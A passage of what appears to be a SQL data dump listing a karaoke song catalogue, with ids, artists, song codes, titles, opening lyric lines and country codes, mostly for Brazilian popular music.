'Leandro e Leonardo', 3705, 'É POR VOCÊ QUE CANTO (THE SOUND OF SILENCE)', 'Quanto mais o tempo passa...', 'BRA'), (716, 'Chitãozinho e Xororó', 3706, 'ELA NÃO VAI MAIS CHORAR', 'Por tantas vezes eu menti', 'BRA'), (717, 'Erasmo Carlos', 3707, 'FESTA DE ARROMBA', 'Vejam só que festa de arromba', 'BRA'), (718, 'Fábio Jr.', 3708, 'IMPOSSÍVEL ACREDITAR QUE PERDI VOCÊ', 'Não, eu não consigo acreditar', 'BRA'), (719, 'Mara Maravilha', 3709, 'JESUS CRISTO', 'Jesus Cristo... eu estou aqui', 'BRA'), (720, 'Grupo União', 3710, 'JURA DE AMOR', 'Você veio de repente e...', 'BRA'), (721, 'É o Tchan', 3711, 'MALHAÇÃO', 'Vou lhe dizer é bom malhar', 'BRA'), (722, 'Banda Magníficos', 3712, 'ME USA', 'Momentos de amor quero com você', 'BRA'), (723, 'Yahoo', 3713, 'MORDIDA DE AMOR', 'Quando faz amor se olha no espelho', 'BRA'), (724, 'Asa de Águia', 3714, 'NÃO TEM LUA', 'Não tem lua que faça você me amar', 'BRA'), (725, 'Razão Brasileira', 3715, 'NATURALMENTE', 'Entre nós dois talvez possa acontecer', 'BRA'), (726, 'Leandro e Leonardo', 3716, 'PIMBA', 'Pode crer rapaziada tudo em...', 'BRA'), (727, 'Companhia do Pagode', 3717, 'PINGOS DE LÁGRIMA', 'Pingos de lágrima molhou meu rosto', 'BRA'), (728, 'Moraes Moreira', 3718, 'POMBO CORREIO', 'Pombo correio voa depressa', 'BRA'), (729, 'Diana', 3719, 'PORQUE BRIGAMOS', 'Quanto mais eu penso em lhe deixar', 'BRA'), (730, 'Grupo Malícia', 3720, 'PRIMEIRO BEIJO', 'Pára de tanta bobagem só pra...', 'BRA'), (731, 'Jorge Benjor', 3721, 'QUE MARAVILHA', 'Lá fora está chovendo...', 'BRA'), (732, 'Jorge Benjor', 3722, 'QUE PENA (ELA JA NÃO GOSTA DE MIM)', 'Ela já não gosta mais de mim...', 'BRA'), (733, 'Caetano Veloso', 3723, 'QUEIXA', 'Um amor assim delicado', 'BRA'), (734, 'Gilberto Gil', 3724, 'SE EU QUISER FALAR COM DEUS', 'Se eu quiser falar com Deus...', 'BRA'), (735, 'Laura Pausini', 3725, 'SE FUÉ', 'Ya no responde ni al...', 'ESP'), (736, 'Adalberto e Adriano', 3726, 'SEPARAÇÃO', 'Qual terá sido o motivo da nossa separação', 'BRA'), (737, 'Selma Reis', 3727, 'SOMBRA EM NOSSO OLHAR', 'Sei, só não sei porque penso em você', 'BRA'), (738, 'Lulu Santos', 3728, 'TÃO BEM', 'Ela me encontrou eu tava por aí', 'BRA'), (739, 'Elis Regina', 3729, 'TIRO AO ALVARO', 'De tanto levar frechada do teu', 'BRA'), (740, 'Lulu Santos', 3730, 'TODA FORMA DE AMOR', 'Eu não pedi pra nascer eu não nasci pra', 'BRA'), (741, 'Cazuza', 3731, 'TODO AMOR QUE HOUVER NESTA VIDA', 'Eu quero a sorte de um amor tranquilo', 'BRA'), (742, 'Banda Cheiro de Amor', 3732, 'TODO MUNDO DANÇA', 'Todo mundo dança move corpo, move', 'BRA'), (743, 'Emílio Santiago-Verônica Sabino', 3733, 'TUDO QUE SE QUER', 'Olha nos meus olhos esquece o que passou', 'BRA'), (744, 'Paulo Sérgio', 3734, 'ÚLTIMA CANÇÃO', 'Esta é a última canção que eu faço', 'BRA'), (745, 'Paulo Diniz', 3735, 'UM CHOPE PRA DISTRAIR', 'Ela passou, deixando um sorriso no', 'BRA'), (746, 'Leno', 3736, 'A POBREZA', 'Todo mundo tem um amor...', 'BRA'), (747, 'Agnaldo Rayol', 3737, 'A PRAIA', 'Em plena praia no céu azul ...', 'BRA'), (748, 'João Mineiro e Marciano', 3738, 'ALINE', 'Ontem retornei na areia...', 'BRA'), (749, 'Agnaldo Rayol', 3739, 'AMIGOS PARA SEMPRE', 'Eu não tenho nada pra dizer', 'BRA'), (750, 'Katinguelê', 3740, 'APELO DE QUEM AMA', 'Quando eu me encontrar...', 'BRA'), (751, 'Caetano Veloso', 3741, 'BELEZA PURA', 'Não me amarra dinheiro não', 'BRA'), (752, 'Luiz Ayrão', 3742, 'BOLA DIVIDIDA', 'Será que essa gente percebeu', 'BRA'), (753, 'Roberto Leal', 3743, 'CASA PORTUGUESA', 'Numa casa portuguesa fica bem', 'BRA'), (754, 'Simony', 3744, 'CERTAS COISAS', 'Não existiria som', 'BRA'), (755, 'Tom Jobim', 3745, 'CHEGA DE SAUDADE', 'Vai, minha tristeza, e diz a ela que', 'BRA'), (756, 'Sílvio Brito', 3746, 'CIDADÃO', 'Tá vendo aquele edifício moço?', 'BRA'), (757, 'Katinguelê', 3747, 'CILADA', 'Êh, mulher me comovi com sua...', 'BRA'), (758, 'Karametade', 3748, 'DECISÃO', 'Há tanto tempo queria te falar...', 'BRA'), (759, 'Só Pra Contrariar', 3749, 'DEPOIS DO PRAZER', 'Tô fazendo amor, com outra pessoa', 'BRA'), (760, 'Shakira', 3750, 'DÓNDE ESTÁS CORAZÓN?', 'Dónde estás corazón?', 'ESP'), (761, 'Roberto Carlos', 3751, 'EU PRECISO DE VOCÊ', 'Eu preciso de você', 'BRA'), (762, 'Marina Lima', 3752, 'EU TE AMO VOCÊ', 'Acho que não sei não, eu não queria dizer', 'BRA'), (763, 'Kid Abelha', 3753, 'FIXAÇÃO', 'Seu rosto na TV parece um...', 'BRA'), (764, 'João Paulo e Daniel', 3754, 'HOJE EU SEI', 'Outra vez eu cheguei tarde...', 'BRA'), (765, '14 Bis', 3755, 'LINDA JUVENTUDE', 'Zabelê, zumbi, besouro vespa fabricando', 'BRA'), (766, 'Gilberto Gil', 3756, 'MARACATU ATÔMICO', 'Atrás do arranha-céu tem o...', 'BRA'), (767, 'Milton Nascimento', 3757, 'MARIA MARIA', 'Maria, Maria é um dom uma certa magia', 'BRA'), (768, 'Jorge Benjor', 3758, 'MAS QUE NADA', 'Oh, Bahia aiô obá, obá, obá...', 'BRA'), (769, 'É o Tchan', 3759, 'MELÔ DO TCHACO II (DANÇA GOSTOSA)', 'Iô, iô, iá, iá... Frente do tchaco pro lado e pra', 'BRA'), (770, 'Raul Seixas', 3760, 'METAMORFOSE AMBULANTE', 'Eu prefiro ser essa metamorfose ambulante', 'BRA'), (771, 'Clara Nunes', 3761, 'O MAR SERENOU', 'O mar serenou quando ela pisou na areia', 'BRA'), (772, 'Negritude Júnior', 3762, 'OLHOS VERMELHOS', 'As coisas já não andam bem...', 'BRA'), (773, 'Cavalo de Pau', 3763, 'PADECER NO PARAÍSO', 'Eu vivi todo esse tempo só pra você', 'BRA'), (774, 'Chitãozinho e Xororó', 3764, 'PÉ NA ESTRADA', 'Pé na estrada, lá vamos nós outra vez', 'BRA'), (775, 'Paulo Diniz', 3765, 'PINGOS DE AMOR', 'A vida passa, telefono e você', 'BRA'), (776, 'Negritude Júnior', 3766, 'QUE DURE PARA SEMPRE', 'Você está aí sozinha eu...', 'BRA'), (777, 'É o Tchan', 3767, 'RALANDO O TCHAN (A DANÇA DO VENTRE)', 'Essa é a mistura do Brasil ...', 'BRA'), (778, 'Zezé Di Camargo e Luciano', 3768, 'RÉDEAS DO POSSANTE', 'Cada palmo dessa estrada eu conheço', 'BRA'), (779, 'Paralamas do Sucesso', 3769, 'ROMANCE IDEAL', 'Ela é só uma menina e eu pagando pelos', 'BRA'), (780, 'João Paulo e Daniel', 3770, 'ROSTO MOLHADO', 'Enxugue o rosto meu amor não...', 'BRA'), (781, 'Elza Soares', 3771, 'SAMBA DA MINHA TERRA', 'O samba da minha terra deixa a gente', 'BRA'), (782, 'Milton Carlos', 3772, 'SAMBA QUADRADO', 'Eu fiz um samba quadrado pra você sentir', 'BRA'), (783, 'Zezé Di Camargo e Luciano', 3773, 'SAUDADE DOS BEATLES', 'Às vezes volto no tempo numa viagem do meu', 'BRA'), (784, 'Titãs', 3774, 'SONÍFERA ILHA', 'Não posso mais viver assim ao seu ladinho', 'BRA'), (785, 'Ara Ketu', 3775, 'TENTAÇÃO', 'No meu corpo ficou a lembrança', 'BRA'), (786, 'Debora Blando', 3776, 'UNICAMENTE', 'Vem sentir a era das águas', 'BRA'), (787, 'Benito Di Paula', 3777, 'VAI FICAR NA SAUDADE', 'Você cortou o barato do meu amor', 'BRA'), (788, 'Milton Nascimento-M.Valle', 3778, 'VIOLA ENLUARADA', 'A mão que toca um violão', 'BRA'), (789, 'João Paulo e Daniel', 3779, 'VOCÊ SÓ ME FAZ FELIZ', 'É nesse sonho que eu me...', 'BRA'), (790, 'Maria Bethânia', 3780, 'VOLTA POR CIMA', 'Chorei, não procurei esconder, todos', 'BRA'), (791, 'Companhia do Pagode', 3781, 'A DANÇA DO ROBÔ', 'Essa é a nova dança que nós vamos lhe', 'BRA'), (792, 'Carnaval', 3782, 'ALLAH LA ÔH', 'Allah la ô, ô ô ô... Mas que calor', 'BRA'), (793, 'Carnaval', 3783, 'AURORA', 'Se você fosse sincera ô, ô, ô, ô...', 'BRA'), (794, 'Carnaval', 3784, 'CABELEIRA DO ZEZÉ', 'Olha a cabeleira do Zezé', 'BRA'), (795, 'Carnaval', 3785, 'CACHAÇA', 'Você pensa que cachaça é água', 'BRA'), (796, 'Leandro e Leonardo', 3786, 'CERVEJA', 'Hoje é sexta-feira chega de...', 'BRA'), (797, 'Carnaval', 3787, 'CORAÇÃO DE JACARÉ', 'Trocaram o coração da minha sogra', 'BRA'), (798, 'Exaltasamba', 3788, 'DEZ A UM', 'Quantas vezes dormi com o astro-rei', 'BRA'), (799, 'Adryana Ribeiro', 3789, 'E AGORA?', 'E agora como é que eu vou ficar', 'BRA'), (800, 'João Paulo e Daniel', 3790, 'ELA TEM O DOM DE ME FAZER CHORAR', 'Deus, hoje eu vim aqui pra...', 'BRA'), (801, 'Katinguelê', 3791, 'ENGRAÇADINHA', 'Linda de viver que gracinha...', 'BRA'), (802, 'Gilberto Gil', 3792, 'ESTRELA', 'Há de surgir uma estrela no...', 'BRA'), (803, 'João Paulo e Daniel', 3793, 'EU ME AMARREI', 'Eu me amarrei, eu me amarrei...', 'BRA'), (804, 'Netinho', 3794, 'FIM DE SEMANA', 'Fim de semana é sexta feira', 'BRA'), (805, 'Jorge Benjor', 3795, 'FIO MARAVILHA', 'Novamente ele chegou com...', 'BRA'), (806, 'Amelinha', 3796, 'FREVO MULHER', 'Quantos aqui ouvem, os olhos eram de', 'BRA'), (807, 'Art Popular', 3797, 'FRICOTE', 'Você é meu amor te quero de novo', 'BRA'), (808, 'Leandro e Leonardo', 3798, 'HORIZONTE AZUL', 'O que mais me dói em noites...', 'BRA'), (809, 'Laura Pausini', 3799, 'INESQUECÍVEL (INCANCELLABILE)', 'Às vezes me pergunto se eu...', 'BRA'), (810, 'Carnaval', 3800, 'JARDINEIRA', 'Ó jardineira por que estás tão triste?', 'BRA'), (811, 'Moraes Moreira', 3801, 'LÁ VEM O BRASIL DESCENDO A LADEIRA', 'Quem desce do morro não morre no asfalto', 'BRA'), (812, 'Carnaval', 3802, 'MAMÃE EU QUERO', 'Mamãe eu quero, mamãe eu quero', 'BRA'), (813, 'Carnaval', 3803, 'MARCHA DA CUECA', 'Eu mato, eu mato', 'BRA'), (814, 'Carnaval', 3804, 'MARIA SAPATÃO', 'Maria Sapatão, sapatão, sapatão', 'BRA'), (815, 'Carnaval', 3805, 'ME DÁ UM DINHEIRO AÍ', 'Ei, você aí me dá um dinheiro aí', 'BRA'), (816, 'Só Pra Contrariar', 3806, 'MINEIRINHO', 'Eu não tenho culpa de comer quietinho', 'BRA'), (817, 'Carnaval', 3807, 'O TEU CABELO NÃO NEGA', 'O teu cabelo não nega mulata', 'BRA'), (818, 'Toke Divinal', 3808, 'PEQUENA PRINCESA', 'Pequena princesa és a primavera', 'BRA'), (819, 'Titãs', 3809, 'PRA DIZER ADEUS', 'Você apareceu do nada', 'BRA'), (820, 'Carnaval', 3810, 'QUEM SABE, SABE', 'Quem sabe, sabe conhece bem', 'BRA'), (821, 'Chiquititas', 3811, 'REMEXE (RECHUFAS)', 'Tudo se transforma com magia', 'BRA'), (822, 'Carnaval', 3812, 'SACA ROLHA', 'As águas vão rolar', 'BRA'), (823, 'Carnaval', 3813, 'SASSARICANDO', 'Sa-sassaricando!', 'BRA'), (824, 'Karametade', 3814, 'SE MELHORAR ESTRAGA', 'Estava mal, de baixo astral...', 'BRA'), (825, 'Fábio Jr.', 3815, 'SÓ VOCÊ', 'Demorei muito pra te encontrar', 'BRA'), (826, 'Só Pra Contrariar', 3816, 'TÁ POR FORA', 'Chega de plantar loucura', 'BRA'), (827, 'Carnaval', 3817, 'TAÍ', 'Taí... Eu fiz tudo pra você gostar de mim', 'BRA'), (828, 'João Paulo e Daniel', 3818, 'TE AMO CADA VEZ MAIS', 'Pegue-me aqueça-me em seu...', 'BRA'), (829, 'Zezé Di Camargo e Luciano', 3819, 'TOMA JUÍZO', 'Hoje estou aqui vim falar de mim', 'BRA'), (830, 'Negritude Júnior', 3820, 'VOCÊ FAZ FALTA', 'Falta alguma coisa no ar', 'BRA'), (831, 'Molejo', 3821, 'A DANÇA DA VASSOURA', 'Diga aonde você vai que eu vou varrendo', 'BRA'), (832, 'Zezé Di Camargo e Luciano', 3822, 'A GENTE FICA SEM SE AMAR', 'Quando acordar de manhã e tomar seu', 'BRA'), (833, 'Banda Eva', 3823, 'ALÔ PAIXÃO', 'Eu não vou perder você', 'BRA'), (834, 'Joanna', 3824, 'AMANHÃ TALVEZ', 'Faz que desse jeito só você...', 'BRA'), (835, 'Roberto Carlos', 3825, 'AMANTE À MODA ANTIGA', 'Eu sou aquele amante à moda antiga', 'BRA'), (836, 'Leandro e Leonardo', 3826, 'ANARRIÊ', 'Em toda festa de São João...', 'BRA'), (837, 'É o Tchan', 3827, 'BAMBOLÊ', 'Vem na pegada do bambo do bambo, bambolê', 'BRA'), (838, 'Oswaldo Montenegro', 3828, 'BANDOLINS', 'Como fosse um par que nessa valsa', 'BRA'), (839, 'Netinho', 3829, 'BEIJO NA BOCA', 'Foi sem querer que eu beijei a sua boca', 'BRA'), (840, 'Peppino Di Capri', 3830, 'CHAMPAGNE', 'Champagne per brindare a un incontro', 'ITA'), (841, 'Elba Ramalho', 3831, 'CIRANDA DA ROSA VERMELHA', 'Teu beijo doce tem sabor do mel da', 'BRA'), (842, 'Fincabaute', 3832, 'COISA DE MALUCO', 'É coisa de maluco alguém falou', 'BRA'), (843, 'Ivan Lins', 3833, 'COMEÇAR DE NOVO', 'Começar de novo e contar...', 'BRA'), (844, 'Negritude Júnior', 3834, 'CONTO DE FADAS', 'Não posso negar que você...', 'BRA'), (845, 'Milton Nascimento', 3835, 'CORAÇÃO DE ESTUDANTE', 'Quero falar de uma coisa', 'BRA'), (846, 'Kaoma', 3836, 'DANÇANDO LAMBADA', 'Morena, cintura de mola...', 'BRA'), (847, 'Caetano Veloso', 3837, 'DEBAIXO DOS CARACÓIS DOS SEUS CABELOS', 'Um dia a areia branca seus pés irão', 'BRA'), (848, 'Tom Jobim', 3838, 'DESAFINADO', 'Se você disser que eu desafino amor', 'BRA'), (849, 'Exaltasamba', 3839, 'DESLIGA E VEM', 'Por favor, me diz quem é você', 'BRA'), (850, 'Simone', 3840, 'ESPERE POR MIM, MORENA', 'Espere por mim, morena espere que eu', 'BRA'), (851, 'Marina Lima', 3841, 'GATA TODO DIA', 'Eu sou uma gata e não gosto de água', 'BRA'), (852, 'Maria Bethânia', 3842, 'GRITO DE ALERTA', 'Primeiro você me azucrina', 'BRA'), (853, 'Kiko Zambianchi', 3843, 'HEY JUDE', 'Hey Jude, não fique assim...', 'BRA'), (854, 'Ultraje a Rigor', 3844, 'INÚTIL', 'A gente não sabemos escolher presidente', 'BRA'), (855, 'Art Popular', 3845, 'IRAÊ', 'Vejo você me olhar ah, que olhar', 'BRA'), (856, 'Skank', 3846, 'MACACO PREGO', 'Eu sou macaco prego', 'BRA'), (857, 'Cazuza', 3847, 'MAIOR ABANDONADO', 'Eu tô perdido, sem pai nem mãe', 'BRA'), (858, 'Agepê', 3848, 'MORO ONDE NÃO MORA NINGUÉM', 'Moro, onde não mora ninguém', 'BRA'), (859, 'Maurício Mattar', 3849, 'NADA APAGA ESSA PAIXÃO', 'Como eu queria te encontrar mais uma', 'BRA'), (860, 'Gilberto Gil', 3850, 'NÃO CHORES MAIS', 'No woman no cry no woman...', 'BRA'), (861, 'Zezé Di Camargo e Luciano', 3851, 'NO DIA EM QUE EU SAÍ DE CASA', 'No dia em que saí de casa', 'BRA'), (862, 'Jorge Benjor', 3852, 'PAÍS TROPICAL', 'Moro num país tropical..', 'BRA'), (863, 'Vanessa Rangel', 3853, 'PALPITE', 'Tô com saudades de você debaixo do meu', 'BRA'), (864, 'Belchior', 3854, 'PARALELAS', 'Dentro do carro sobre o trevo', 'BRA'), (865, 'Chitãozinho e Xororó', 3855, 'PENSANDO EM MINHA AMADA', 'Imagine um rapaz apaixonado', 'BRA'), (866, 'Amado Batista', 3856, 'PRINCESA', 'Ao te ver pela primeira vez', 'BRA'), (867, 'Fundo de Quintal', 3857, 'RESPONDE', 'Responde se me quer de verdade', 'BRA'), (868, 'Heróis da Resistência', 3858, 'SÓ PRO MEU PRAZER', 'Não fala nada deixa tudo...', 'BRA'), (869, 'Zezé Di Camargo e Luciano', 3859, 'VEM CUIDAR DE MIM', 'Eu já fiz de tudo pra não te perder', 'BRA'), (870, 'Luiz Gonzaga', 3860, 'XOTE DAS MENINAS', 'Mandacaru quando fura lá na cerca', 'BRA'), (871, 'Fundo de Quintal', 3861, 'A AMIZADE', 'Lá lá iá... Meu amigo, amigo hoje', 'BRA'), (872, 'Chitãozinho e Xororó', 3862, 'A MINHA VIDA', 'Eu sei, eu aprendi a me aceitar', 'BRA'), (873, 'Gilberto Gil', 3863, 'AQUELE ABRAÇO', 'Este samba vai pra Dorival...', 'BRA'), (874, 'Chiquititas', 3864, 'BERLINDA (BERLIN)', 'Neste jogo só se diz a verdade', 'BRA'), (875, 'Tim Maia', 3865, 'BONS MOMENTOS', 'Bons momentos eu passei fui feliz ao', 'BRA'), (876, 'Gilson', 3866, 'CASINHA BRANCA', 'Eu tenho andado tão sozinho...', 'BRA'), (877, 'Caetano Veloso', 3867, 'CHUVA, SUOR E CERVEJA', 'Não se perca de mim', 'BRA'), (878, 'É o Tchan', 3868, 'DANÇA DO PÕE, PÕE', 'Olha o Tchan que já chegou', 'BRA'), (879, 'Tim Maia', 3869, 'O DESCOBRIDOR DOS SETE MARES', 'Uma luz azul me guia', 'BRA'), (880, 'Exaltasamba', 3870, 'DOIDINHO', 'Vem menina com teu sabor e ...', 'BRA'), (881, 'Lobão', 3871, 'ESSA NOITE NÃO', 'A cidade enlouquece sonhos tortos', 'BRA'), (882, 'Altemar Dutra', 3872, 'ESTÃO VOLTANDO AS FLORES', 'Vê... Estão voltando as...', 'BRA'), (883, 'Gian e Giovani', 3873, 'EU BUSCO UMA ESTRELA', 'No que está pensando?...', 'BRA'), (884, 'Leno e Lilian', 3874, 'EU NÃO SABIA QUE VOCÊ EXISTIA', 'Quando eu te conheci meu bem, não', 'BRA'), (885, 'Zezé Di Camargo e Luciano', 3875, 'EU SÓ PENSO EM VOCÊ', 'Maybe I didn''t love you', 'BRA'), (886, 'Amelinha', 3876, 'FOI DEUS QUEM FEZ VOCÊ', 'Foi Deus que fez o céu o rancho das estrelas', 'BRA'), (887, 'Almir Rogério', 3877, 'FUSCÃO PRETO', 'Me disseram que ela foi vista com outro', 'BRA'), (888, 'Wando', 3878, 'GOSTOSA', 'É tão gostosa ela é toda faceira', 'BRA'), (889, 'Raimundos', 3879, 'I SAW YOU SAYING', 'Reconheci a Madonna ali parada no jardim', 'BRA'), (890, 'Alceu Valença', 3880, 'LA BELLE DE JOUR', 'Ah! eh! ah! Eh... La belle de jour... Eu lembro', 'BRA'), (891, 'Roberto Carlos', 3881, 'LOBO MAU', 'Eu sou do tipo que não gosta de casamento', 'BRA'), (892, 'Karametade', 3882, 'LOUCA SEDUÇÃO', 'Com você eu fiz amor eu fiz...', 'BRA'), (893, 'Agepê', 3883, 'MOÇA CRIANÇA', 'O seu andar tem jeito de moça...', 'BRA'), (894, 'Legião Urbana', 3884, 'MONTE CASTELO', 'Ainda que eu falasse a...', 'BRA'), (895, 'Mastruz Com Leite', 3885, 'MOTO TÁXI', 'Tenho uma moto táxi pra fazer corrida', 'BRA'), (896, 'J.B. Samba', 3886, 'NA PALMA DA MÃO', 'Um bom pagode começa assim...', 'BRA'), (897, 'Claudinho e Buchecha', 3887, 'NOSSO SONHO', 'Gatinha quero te encontrar', 'BRA'), (898, 'Wanderley Cardoso', 3888, 'O BOM RAPAZ', 'Parece que eu sabia que hoje era o', 'BRA'), (899, 'Cidade Negra', 3889, 'O ERÊ', 'Uh, uh, uh, uh... Pra entender o erê tem que', 'BRA'), (900, 'Barão Vermelho', 3890, 'O POETA ESTÁ VIVO', 'Baby, compra o jornal e vem ver o sol', 'BRA'), (901, 'Banda Cheiro de Amor', 3891, 'PEGA NO BALANÇO', 'É bom demais fazer amor', 'BRA'), (902, 'Zizi Possi', 3892, 'PER AMORE', 'Io conosco la tua estrada', 'ITA'), (903, 'Ara Ketu', 3893, 'PIPOCA', 'O Araketu o Araketu quando toca', 'BRA'), (904, 'Jessé', 3894, 'PORTO SOLIDÃO', 'Se um veleiro repousasse...', 'BRA'), (905, 'Netinho', 3895, 'PRA TE TER AQUI', 'Me sinto tão sozinho por que não vem me', 'BRA'), (906, 'Chitãozinho e Xororó', 3896, 'PURA EMOÇÃO', 'Ela é mistério nesse jeito sério', 'BRA'), (907, 'Raul Seixas', 3897, 'ROCK DAS "ARANHA"', 'Subi no muro do quintal e vi uma transa que', 'BRA'), (908, 'Sensação', 3898, 'SENTIMENTO NU', 'É... tudo era azul sentimento nu', 'BRA'), (909, 'Milton Guedes', 3899, 'SONHO DE UMA NOITE DE VERÃO', 'Sonho de uma noite de verão', 'BRA'), (910, 'Banda Eva', 3900, 'VEM MEU AMOR', 'Quando te vejo paro logo em teu olhar', 'BRA'), (911, 'Tião Carreiro e Pardinho', 3901, 'AMARGURADO', 'O que é feito daqueles beijos que eu', 'BRA'), (912, 'Grupo Feitiço', 3902, 'AMOR PERFEITO', 'Fecho os olhos pra não ver...', 'BRA'), (913, 'Alceu Valença', 3903, 'ANUNCIAÇÃO', 'Na bruma leve das paixões', 'BRA'), (914, 'Katinguelê', 3904, 'APAIXONADAMENTE', 'Quando, te encontrei chorando...', 'BRA'), (915, 'Roberto Carlos', 3905, 'AS CANÇÕES QUE VOCÊ FEZ PRA MIM', 'Hoje eu ouço as canções que você fez', 'BRA'), (916, 'Netinho', 3906, 'BARRACOS (ESCOMBROS)', 'Pra quem mora lá no morro', 'BRA'), (917, 'Só Pra Contrariar', 3907, 'BOCA A BOCA', 'Foi assim que aconteceu nossa', 'BRA'), (918, 'Zezé Di Camargo e Luciano', 3908, 'CADA VOLTA É UM RECOMEÇO', 'Mais uma vez, meu coração esquece o que', 'BRA'), (919, 'Asa de Águia', 3909, 'DANÇA DA MANIVELA', 'Dança da manivela', 'BRA'), (920, 'Paulo Ricardo', 3910, 'DOIS', 'Quando você disse nunca mais', 'BRA'), (921, 'Leandro e Leonardo', 3911, 'ESSAS MULHERES', 'Essas mulheres nos tiram e...', 'BRA'), (922, 'É o Tchan', 3912, 'ESTÁTUA', 'Venha comigo requebrar', 'BRA'), (923, 'Roberto Carlos', 3913, 'FALANDO SÉRIO', 'Falando sério é bem melhor você parar', 'BRA'), (924, 'Sem Compromisso', 3914, 'FELICIDADE ESCONDIDA', 'Deixo um beijo de adeus', 'BRA'), (925, 'Sérgio Reis', 3915, 'FUI PRA CASA DA VIZINHA', 'Tomei uma cervejada no bar da dona', 'BRA'), (926, 'Léo Jaime', 3916, 'GATINHA MANHOSA', 'Meu bem, já não precisa', 'BRA'), (927, 'Chico Buarque', 3917, 'GENTE HUMILDE', 'Tem certos dias em que eu penso em', 'BRA'), (928, 'Wilma Bentivegna', 3918, 'HINO AO AMOR (HYMNE A L''AMOUR)', 'Se o azul do céu escurecer', 'BRA'), (929, 'Luís Miguel', 3919, 'LA BARCA', 'Dicen que la distancia es el olvido', 'ESP'), (930, 'Banda Eva', 3920, 'LEVA EU', 'Oh! Leva eu, eva, eva', 'BRA'), (931, 'Belchior', 3921, 'MEDO DE AVIÃO', 'Foi por medo de avião', 'BRA'), (932, 'Renato e Seus Blue Caps', 3922, 'MENINA LINDA', 'Ah! Deixa essa boneca faça-me o favor', 'BRA'), (933, 'Soweto', 3923, 'MOMENTOS', 'Deixa o nosso mundo se encontrar', 'BRA'), (934, 'Celine Dion', 3924, 'MY HEART WILL GO ON', 'Every night In my dreams I see you, I f', 'EUA'), (935, 'Chitãozinho e Xororó', 3925, 'O HOMEM DE NAZARÉ', 'Ei, tá chegando o ano dois mil', 'BRA'), (936, 'Altemar Dutra', 3926, 'O TROVADOR', 'Sonhei que eu era um dia um trovador', 'BRA'), (937, 'Banda Cheiro de Amor', 3927, 'OLHA EU AÍ', 'Olha... ê olha eu olha eu sim', 'BRA'), (938, 'Gonzaguinha', 3928, 'PONTO DE INTERROGAÇÃO', 'Por acaso algum dia você se...', 'BRA'), (939, 'Sensação', 3929, 'PRECISO DESSE MEL', 'Quando a sua beleza pisou', 'BRA'), (940, 'Roberto Carlos', 3930, 'QUANDO', 'Quando você se separou de mim', 'BRA'), (941, 'Cleiton e Camargo', 3931, 'QUANDO UM GRANDE AMOR SE FAZ', 'Todo amor parece no começo um mar de', 'BRA'), (942, 'Ciro Monteiro', 3932, 'SE ACASO VOCÊ CHEGASSE', 'Se acaso você chegasse e no meu', 'BRA'), (943, 'Chitãozinho e Xororó', 3933, 'SE DEUS ME OUVISSE', 'Ah! Se Deus me ouvisse e mandasse pra', 'BRA'), (944, 'Luiz Carlos', 3934, 'SEMPRE HÁ SAÍDA', 'Quantas vezes eu te pedi pra se lembrar', 'BRA'), (945, 'Debora Blando', 3935, 'SOMENTE O SOL', 'Somente o sol você e eu', 'BRA'), (946, 'Peninha', 3936, 'SONHOS', 'Tudo era apenas uma brincadeira', 'BRA'), (947, 'Caetano Veloso-Gal Costa', 3937, 'SORTE', 'Tudo de bom que você me fizer', 'BRA'), (948, 'Bruno e Marrone', 3938, 'TE AMO E NÃO TE QUERO', 'Pegue tudo aquilo que é seu', 'BRA'), (949, 'Lulu Santos', 3939, 'TEMPOS MODERNOS', 'Eu vejo a vida melhor no futuro', 'BRA'), (950, 'Zezé Di Camargo e Luciano', 3940, 'VIVENDO POR VIVER', 'Sem motivo vou vivendo por aí', 'BRA'), (951, 'Moacyr Franco', 3946, 'AINDA ONTEM CHOREI DE SAUDADE', 'Você me pede na carta que eu desapareça', 'BRA'), (952, 'Fábio Jr.', 3951, 'DESEJOS E DELÍRIOS', 'Amor é uma palavra que enfeita, que', 'BRA'), (953, 'Banda Magníficos', 3965, 'O HOMEM IDEAL', 'Só quero um homem que...', 'BRA'), (954, 'Carlos Gonzaga', 3966, 'OH CAROL', 'Oh Carol sem o teu amor tudo é tristeza', 'BRA'), (955, 'Geraldo Vandré', 3968, 'PRA NÃO DIZER QUE NÃO FALEI DAS FLORES', 'Caminhando e cantando e...', 'BRA'), (956, 'Ed Motta', 4000, 'FORA DA LEI', 'Cidade nua, noite neon', 'BRA'), (957, 'Baby do Brasil (Baby Consuelo)', 4004, 'MENINO DO RIO', 'Menino do Rio calor que provoca arrepio', 'BRA'), (958, 'Skank', 4011, 'RESPOSTA', 'Bem mais que o tempo que nós perdemos', 'BRA'), (959, 'Chrystian e Ralf', 4013, 'SENSÍVEL DEMAIS', 'Hoje eu tive medo de acordar de um sonho', 'BRA'), (960, 'Leandro e Leonardo', 4015, 'UM SONHADOR', 'Eu não sei pra onde vou...', 'BRA'), (961, 'Sandy-Andrea Bocelli', 4019, 'VIVO POR ELLA', 'Vivo por ella sin saber', 'ESP'), (962, 'Daniel', 4021, 'ADORO AMAR VOCÊ', 'Tá no meu paladar...', 'BRA'), (963, 'Cleiton e Camargo', 4022, 'AGENDA RABISCADA', 'Você fala por aí que não me ama', 'BRA'), (964, 'José Augusto', 4023, 'AGUENTA CORAÇÃO', 'Coração diz pra mim...', 'BRA'), (965, 'Gal Costa', 4026, 'BABY', 'Você precisa saber da...', 'BRA'), (966, 'Raul Seixas', 4029, 'COWBOY FORA DA LEI', 'Mamãe não quero ser prefeito', 'BRA'), (967, 'Leandro e Leonardo', 4030, 'CUMADE E CUMPADE', 'Veste a calça Saint Tropez...', 'BRA'), (968, 'Marisa Monte', 4031, 'DE NOITE NA CAMA', 'De noite na cama, eu fico pensando', 'BRA'), (969, 'Chitãozinho e Xororó', 4032, 'DEIXEI DE SER COWBOY POR ELA', 'Eu sempre acreditei no amor', 'BRA'), (970, 'Zezé Di Camargo e Luciano', 4049, 'PRA NÃO PENSAR EM VOCÊ', 'Quando a saudade doer...', 'BRA'), (971, 'Marcos Sabino', 4051, 'RELUZ', 'Brilha no céu de novo uma estrela ah', 'BRA'), (972, 'Terrasamba', 4056, 'TÁ TIRANDO ONDA', 'Tá tirando onda, tá tirando ondinha', 'BRA'), (973, 'Elis Regina', 4063, 'ALÔ, ALÔ MARCIANO', 'Alô, alô marciano ...', 'BRA'), (974, 'Gilberto Gil', 4065, 'ANDAR COM FÉ', 'Andar com fé eu vou, que a fé...', 'BRA'), (975, 'Altemar Dutra', 4067, 'BRIGAS', 'Veja só que tolice nós dois', 'BRA'), (976, 'Zezé Di Camargo e Luciano-Júlio Iglesias', 4074, 'DOIS AMIGOS', 'Amigo eu vim aqui pra te falar', 'BRA'), (977, 'Rick e Renner', 